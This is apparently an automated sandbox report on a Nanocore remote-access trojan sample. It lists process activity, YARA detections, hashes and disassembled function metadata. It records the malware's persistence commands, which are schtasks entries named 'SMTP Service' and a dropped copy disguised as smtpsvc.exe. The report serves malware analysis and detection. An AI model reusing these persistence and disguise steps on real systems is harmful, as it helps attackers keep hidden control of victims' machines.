Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Imagebase:	0xf50000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000000.451843619.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.704763684.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000000.453026505.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.704932496.0000000000560000.00000004.00020000.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000000.452221812.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000000.452672182.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, Author: Joe Security Rule: NanoCore, Description: unknown, Source: 00000007.00000002.706102715.0000000003676000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net> Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000007.00000002.704921985.0000000000550000.00000004.00020000.sdmp, Author: Florian Roth
Reputation:	moderate

Chronological Activities

Analysis Process: schtasks.exe PID: 2524 Parent PID: 2936

General

Start time:	14:31:42
Start date:	26/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp249A.tmp'
Imagebase:	0x730000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: taskeng.exe PID: 684 Parent PID: 896

General

Start time:	14:31:45
Start date:	26/10/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {AC07D2CB-425B-43FA-983F-3B14071F638D} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xffdd0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: schtasks.exe PID: 1964 Parent PID: 2936

General

Start time:	14:31:46
Start date:	26/10/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp1E64.tmp'
Imagebase:	0x9d0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: RegSvcs.exe PID: 1268 Parent PID: 684

General

Start time:	14:31:46
Start date:	26/10/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe 0
Imagebase:	0xf50000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Chronological Activities

Analysis Process: smtpsvc.exe PID: 3048 Parent PID: 684

General

Start time:	14:31:50
Start date:	26/10/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Imagebase:	0xa40000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs

Chronological Activities

Analysis Process: smtpsvc.exe PID: 1968 Parent PID: 1764

General

Start time:	14:31:54
Start date:	26/10/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Imagebase:	0x1080000
File size:	32768 bytes
MD5 hash:	72A9F09010A89860456C6474E2E6D25C
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: catzjt7863.exe PID: 1848 Parent PID: 2724 catzjt7863.exeCOMMON

Executed Functions

Function 004309D7, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00430A57

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: b0089061bed67da0677ad85e3cadeff50578f69d88cdafd976adf74f4510f9ba
Instruction ID: 5a3135579f188004dda339326eb257e2d40447ca944c5c9dfc3a8fb71bb89e4a
Opcode Fuzzy Hash: b0089061bed67da0677ad85e3cadeff50578f69d88cdafd976adf74f4510f9ba
Instruction Fuzzy Hash: 85210275109380AFEB128F24DC44B52BFB4EF16310F0885DBE9848F663D275E908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00430B59, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 00430BC5

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 6b4925b031e3a1584b8609e0dc0fc7a52a0db68f448626c5a5943b94d0a1e84d
Instruction ID: 927e8743ed26556e8a9fc84fc4a4ab07390d546d2155681e66b4651557dbfdd7
Opcode Fuzzy Hash: 6b4925b031e3a1584b8609e0dc0fc7a52a0db68f448626c5a5943b94d0a1e84d
Instruction Fuzzy Hash: 5711D0724093C09FDB228F14DC45A52FFB4EF06314F0984DAE9844F663C276A908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00430A0E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 00430A57

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 6d9bbc39d0af68a8cc54a75768e6b8bdafec7eb92c28a03b91db21d5a04d1522
Instruction ID: fe65d3e5b03c184663cdddba83221a698e431f076204fea3519ed6f3e1f7b958
Opcode Fuzzy Hash: 6d9bbc39d0af68a8cc54a75768e6b8bdafec7eb92c28a03b91db21d5a04d1522
Instruction Fuzzy Hash: C1117C756003049FEB20DF55E884B66FBE4FF18320F08C5AAED4A8B612D275E854DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00430B8A, Relevance: 1.5, APIs: 1, Instructions: 38nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 00430BC5

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: 6ac30a418a7593c13336d346a4539b71947b5b592596fcd44e16f8b0e2ffcaf1
Instruction ID: 0becc43e645a1f86e33c29b26a35b74f8b9d972f4b195a8b74f6d1a7140c8bbe
Opcode Fuzzy Hash: 6ac30a418a7593c13336d346a4539b71947b5b592596fcd44e16f8b0e2ffcaf1
Instruction Fuzzy Hash: 36018B35400340DFEB208F85E889B26FBA0EB08324F08C59ADE490B612C276B558DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00340138, Relevance: .8, Instructions: 788COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c737491264ffdeea70e1ff24666a35723e3ed4bab381b97aa2d66f933c17ce55
Instruction ID: 8fadd5a392272e03a66003a28499eeacd381f92a249d198737d52c301503c7cf
Opcode Fuzzy Hash: c737491264ffdeea70e1ff24666a35723e3ed4bab381b97aa2d66f933c17ce55
Instruction Fuzzy Hash: BA82C134A11259CFDB64DB64C894BEDB3B2AF8A300F5085EAE4097B351DB71AE85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0034012A, Relevance: .7, Instructions: 740COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bde46935cc01622b67e2e163c21dd287e0bbf76fddbfd9610a608bcaffb7b22d
Instruction ID: 8c073d90353fae8e397fb35a5a1b3dfcd62ef509626b678e1ee2da96220195a4
Opcode Fuzzy Hash: bde46935cc01622b67e2e163c21dd287e0bbf76fddbfd9610a608bcaffb7b22d
Instruction Fuzzy Hash: ED72C134A11259CFDB64DB64C894BDDB3B2AF8A300F5085EAE4097B351DB71AE86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003489B2, Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd54ef6299013cc73e29e13ceedf4d7c0f6a7a989ef1b4449cacb25f4209704a
Instruction ID: 4b23fc8d819090ff3c960af7eae74fd92fb4d422c373dffbc72ecb8fc373d81a
Opcode Fuzzy Hash: dd54ef6299013cc73e29e13ceedf4d7c0f6a7a989ef1b4449cacb25f4209704a
Instruction Fuzzy Hash: DB9101B4D01208CFDB01DFA9D484AAEFBF2FF89310F24816AD415AB254DB74AA41CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00341AC8, Relevance: .2, Instructions: 214COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09c784b38b095f8dbd499c50b7e417de8a2c38a214ae88df1759b443bf66a5f9
Instruction ID: 5efb442545d55d894c3e9c7ceda4688d7bb65092934dc036efc781fe9981b5d7
Opcode Fuzzy Hash: 09c784b38b095f8dbd499c50b7e417de8a2c38a214ae88df1759b443bf66a5f9
Instruction Fuzzy Hash: DB91BFB4D04629CBDF65CFA9C8447EEBBF6BF4A300F10906AD409AB254DB746985DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00341F90, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c40ef7bb6869329db67ea439daa1b45bb617a1c1ae6b68eaf1bbc88b918fcd
Instruction ID: 274bcced0a9e1627f89a984c7c7a16d3939451a11bcfc7c56f5b69a9157bf434
Opcode Fuzzy Hash: 45c40ef7bb6869329db67ea439daa1b45bb617a1c1ae6b68eaf1bbc88b918fcd
Instruction Fuzzy Hash: 538100B4E05218CFCB05DFA9C884AAEFBF5FF49300F64856AE409BB255D734A981CB54

Uniqueness

Uniqueness Score: -1.00%

Function 00341AB7, Relevance: .2, Instructions: 194COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7067ec16dc95f6727e9a443c3d237ad505fa3df708d88cff9bf6eef0309d9ec
Instruction ID: 1cbe17cd8d47cab1e53b71b56add6c895176aebc8ee1bc639f6138fc8202841b
Opcode Fuzzy Hash: f7067ec16dc95f6727e9a443c3d237ad505fa3df708d88cff9bf6eef0309d9ec
Instruction Fuzzy Hash: 6D81BFB4D05628CFDB65CFA9C8447ADBBF6BF8A300F10806AD409AB255DB746985DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00340006, Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dac0a81628f8dd5d2ab5d5778a2f6a97383f645e19dfe8baaecc02e90c859ef8
Instruction ID: aca42e095ab489d685b9646bdef7f6bb3e5a57bf195abec61674a1356ebc5e10
Opcode Fuzzy Hash: dac0a81628f8dd5d2ab5d5778a2f6a97383f645e19dfe8baaecc02e90c859ef8
Instruction Fuzzy Hash: 8B11F26144F3C49FD7039B74886659A7FB0AF17210B0B18EBC480DF1A3DA685E09E7A2

Uniqueness

Uniqueness Score: -1.00%

Function 0034B831, Relevance: 5.1, Strings: 4, Instructions: 112COMMON

Download Yara Rule

Strings

(, xrefs: 0034BB3A
,, xrefs: 0034BB3F
, xrefs: 0034BEED
-, xrefs: 0034B885

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID: $($,$-
API String ID: 0-2507013945
Opcode ID: a30205ff6c8b51d7646af32ad8acdae46d83bf924cc131dd54aa0a4162150d09
Instruction ID: ae5f101ec59f4395c72021c6d0d0b8e2749638b4a01c1a0ea931e14b3cb96c1a
Opcode Fuzzy Hash: a30205ff6c8b51d7646af32ad8acdae46d83bf924cc131dd54aa0a4162150d09
Instruction Fuzzy Hash: E251DE74900228CFDB65DF64C898BD8BBF1EB59304F1085E9D509AB291CB34AEC5CF50

Uniqueness

Uniqueness Score: -1.00%

Function 0034AEC8, Relevance: 2.7, Strings: 2, Instructions: 207COMMON

Download Yara Rule

Strings

HVq, xrefs: 0034B0F0
HVq, xrefs: 0034B100

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID: HVq$HVq
API String ID: 0-837252020
Opcode ID: ace408c50c1b65126f6b9435c302d3c986a1a51d7e2484b53aa10211e786ea7f
Instruction ID: ec1d282fc69cca52ec5498693d332132db9771adeb5fcb1c42392dbafb00138b
Opcode Fuzzy Hash: ace408c50c1b65126f6b9435c302d3c986a1a51d7e2484b53aa10211e786ea7f
Instruction Fuzzy Hash: D591DEB4D05218CFDB15CFA8D8947EEBBF5BB09301F20812AD415BB280E778AA85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0034C028, Relevance: 2.5, Strings: 2, Instructions: 31COMMON

Download Yara Rule

Strings

', xrefs: 0034B5B0
%, xrefs: 0034C046

Memory Dump Source

Source File: 00000004.00000002.453850641.0000000000340000.00000040.00000001.sdmp, Offset: 00340000, based on PE: false

Similarity

API ID:
String ID: %$'
API String ID: 0-2502232532
Opcode ID: 17c185feeea7d20b499f5073da21d8896e82c943abb0c75c45a627d14329caa4
Instruction ID: cfb1e1f145f1e4962da0616af13234a0c8f569082f631dfbd8370cbe61535ac3
Opcode Fuzzy Hash: 17c185feeea7d20b499f5073da21d8896e82c943abb0c75c45a627d14329caa4
Instruction Fuzzy Hash: 0101DD35A08228CEDB61CFA5C844BEDBBF1EB1A305F2081DAD048A6295C3799AC5DF01

Uniqueness

Uniqueness Score: -1.00%

Function 0043143A, Relevance: 1.6, APIs: 1, Instructions: 144fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00431549

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2b92fd2319d14c0700d46eacba92ea76efb7d9fba45f6709e24c0a6dbb0e59a5
Instruction ID: 7c3d85eff02be5f8bc8d9fe056351d13f0cdc27d1d19c275f265e3323b238a70
Opcode Fuzzy Hash: 2b92fd2319d14c0700d46eacba92ea76efb7d9fba45f6709e24c0a6dbb0e59a5
Instruction Fuzzy Hash: 38514B7140E3C05FE7138B658C64AA2BFB4AF47710F0944DBE8C58F1A3D265A809D772

Uniqueness

Uniqueness Score: -1.00%

Function 0019A2AC, Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

SetConsoleCtrlHandler.KERNEL32(?,00000E40,?,?), ref: 0019A346

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: ConsoleCtrlHandler
String ID:
API String ID: 1513847179-0
Opcode ID: b1afd5bb500a7a1dcd1d53898747b13c87b3599896e8871426885eb8adfdf653
Instruction ID: 88bc17ef372d446877fcd94dc1e2147d5c1c7e5e7306091a86fc1779f6ffad8b
Opcode Fuzzy Hash: b1afd5bb500a7a1dcd1d53898747b13c87b3599896e8871426885eb8adfdf653
Instruction Fuzzy Hash: DB31D07190E3C05FD7138B259C51B62BFB4EF83620F0941DBD884CB6A3D229A91DC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00431086, Relevance: 1.6, APIs: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetTokenInformation.KERNELBASE(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 00431130

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 5d136a6e293c4d8177c86d3a123de9acf364c4c16775c27ce57d569f7a163500
Instruction ID: 5637b50c5cadc038ebc8c701b0708de1f53f5dde7541c8a150b53abf9795a94f
Opcode Fuzzy Hash: 5d136a6e293c4d8177c86d3a123de9acf364c4c16775c27ce57d569f7a163500
Instruction Fuzzy Hash: 0831B571405380AFEB228F64DC45FA6BFB8EF06310F0845DBE9848B153D225E909C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0019AC22, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0019ACD1

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 552a86112a855259a87f1d3890ba8fce16850f7a2647d491bfb34c2d629bcede
Instruction ID: cabffe6463f1b06903733a9ca5cafdb4007aa718782646709a73bd9634bddffd
Opcode Fuzzy Hash: 552a86112a855259a87f1d3890ba8fce16850f7a2647d491bfb34c2d629bcede
Instruction Fuzzy Hash: 8331D172504380AFE7228F55DC45FA7BFACEF06310F0885ABED858B152D265E909CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0019AD19, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 0019ADD4

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 639a00f08397d83a1ed175696d73dc69e2c55b94c7d573b824c6d454687ade7f
Instruction ID: 40b9427d7fea9ab074d20e052a62094985536f2eb0ea4bf8f0ebb0ae2fc3c935
Opcode Fuzzy Hash: 639a00f08397d83a1ed175696d73dc69e2c55b94c7d573b824c6d454687ade7f
Instruction Fuzzy Hash: B73195715093849FEB22CB65CC44FA2BFF8EF06710F08859AE9458B553D364E949CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 004304AE, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00430555

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: ca485d12fb1d64cd32208474a358920986ea772d09ddd764db7a6f8c308fa684
Instruction ID: 2acdd7b992068c857a6bc591bb48b5abb6a1209e80e145c712318be69f2a3cab
Opcode Fuzzy Hash: ca485d12fb1d64cd32208474a358920986ea772d09ddd764db7a6f8c308fa684
Instruction Fuzzy Hash: 0D31A171509780AFE721CB65DC54B56BFB8EF06310F08859AE9848B292D335E908CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00430838, Relevance: 1.6, APIs: 1, Instructions: 82COMMON

Download Yara Rule

APIs

SetNamedSecurityInfoW.ADVAPI32(?,?,?,?,?,?,?), ref: 004308D2

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: InfoNamedSecurity
String ID:
API String ID: 1443090519-0
Opcode ID: d7a60fd422370c28040a503b26ef4b45a9de490c83b94f8ed8ffb1a2468478ec
Instruction ID: 59f0419ac8a197e9590cfec7018b188748bd0aa568d0a60b2b9660522b53597b
Opcode Fuzzy Hash: d7a60fd422370c28040a503b26ef4b45a9de490c83b94f8ed8ffb1a2468478ec
Instruction Fuzzy Hash: 143180715047449FE721CF25DC54B63BBE8EF09310F08859AE988CB253D335E908CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004315A0, Relevance: 1.6, APIs: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileType.KERNELBASE(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 00431635

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: FileType
String ID:
API String ID: 3081899298-0
Opcode ID: 81fe8c7b4a4ab311d2da572283ababfe972ad3028ded38a659826cbdaa6122f8
Instruction ID: a15027c6093c83a01b36d6cccd67c409954e86205a269940e947a81f3a93e2a1
Opcode Fuzzy Hash: 81fe8c7b4a4ab311d2da572283ababfe972ad3028ded38a659826cbdaa6122f8
Instruction Fuzzy Hash: FF2107B6408784AFE7128B159C45FA3BFA8EF46720F0881DBE9858B193D224A909C775

Uniqueness

Uniqueness Score: -1.00%

Function 004314CA, Relevance: 1.6, APIs: 1, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00431549

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 33f9204c60c986419c044c18e7806e53df8bb12292d6e6a8555124b32c5dbf5f
Instruction ID: c17317ab26449fdab1648b32e6f470a9d1e44e8665354b28151b5e0d7e62dd55
Opcode Fuzzy Hash: 33f9204c60c986419c044c18e7806e53df8bb12292d6e6a8555124b32c5dbf5f
Instruction Fuzzy Hash: CF219D71500300AFFB20CF65DC45B6AFBE8EF48310F1485AEE98A8B652D775E904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 00431670, Relevance: 1.6, APIs: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 00431701

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: d9eb6eff11e05c31a1d73f75cf987649e6334d1b1d69b77df60a6979bd4b7ef0
Instruction ID: 354b9e1a72febe2bec5cb3fca00ef6d40366855dcd79824f2caf805815f3a0c6
Opcode Fuzzy Hash: d9eb6eff11e05c31a1d73f75cf987649e6334d1b1d69b77df60a6979bd4b7ef0
Instruction Fuzzy Hash: 9E21A171409380AFE7228B55DC44FA6BFB8EF46314F0885DBE9848B593C265A909CB76

Uniqueness

Uniqueness Score: -1.00%

Function 0019AC52, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,00000E40), ref: 0019ACD1

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: d758e677ee12f4cdc1be5ba0211b83e43452a4e0c23eef636a60a0a3d401de96
Instruction ID: 92f6ae772329d563121d4648785fa117c7d725ec2e72834d2d5e362bcbf9e596
Opcode Fuzzy Hash: d758e677ee12f4cdc1be5ba0211b83e43452a4e0c23eef636a60a0a3d401de96
Instruction Fuzzy Hash: 4721A172500304AFFB21DF55DC84F6BFBACEF04310F14855AE9458A641D671E9489AB2

Uniqueness

Uniqueness Score: -1.00%

Function 004305AC, Relevance: 1.6, APIs: 1, Instructions: 73COMMON

Download Yara Rule

APIs

LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 00430632

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 8089614f46f1b169fc997d01914b6b7d8a88a7cc6c7de1f21e769e5aae8f525e
Instruction ID: 59cba67dcf36f87bee72e67dcbc76c8b305412e052b7b468c1b0f4c3b2fcfb4b
Opcode Fuzzy Hash: 8089614f46f1b169fc997d01914b6b7d8a88a7cc6c7de1f21e769e5aae8f525e
Instruction Fuzzy Hash: F921C1B25043809FE711CF25DC85B92BFA8EF56320F0985ABE984CB663D334D818CB61

Uniqueness

Uniqueness Score: -1.00%

Function 004304E2, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON

Download Yara Rule

APIs

CreateMutexW.KERNELBASE(?,?), ref: 00430555

Memory Dump Source

Source File: 00000004.00000002.453921089.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: df4818df02f62f3893d45829a3a23d097eab51fc16536689c939779280f64c99
Instruction ID: 9e25fe1a2b98baebcb10d495a7196f82d48c1f2b3bca3922f36a656377248e94
Opcode Fuzzy Hash: df4818df02f62f3893d45829a3a23d097eab51fc16536689c939779280f64c99
Instruction Fuzzy Hash: 74219F71501340AFF720CF65DC85B6AFBE8EF08320F1485AAED488B241D275E904CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0019AD5A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32(?,00000E40,BCC3C851,00000000,00000000,00000000,00000000), ref: 0019ADD4

Memory Dump Source

Source File: 00000004.00000002.453693236.000000000019A000.00000040.00000001.sdmp, Offset: 0019A000, based on PE: false

Similarity

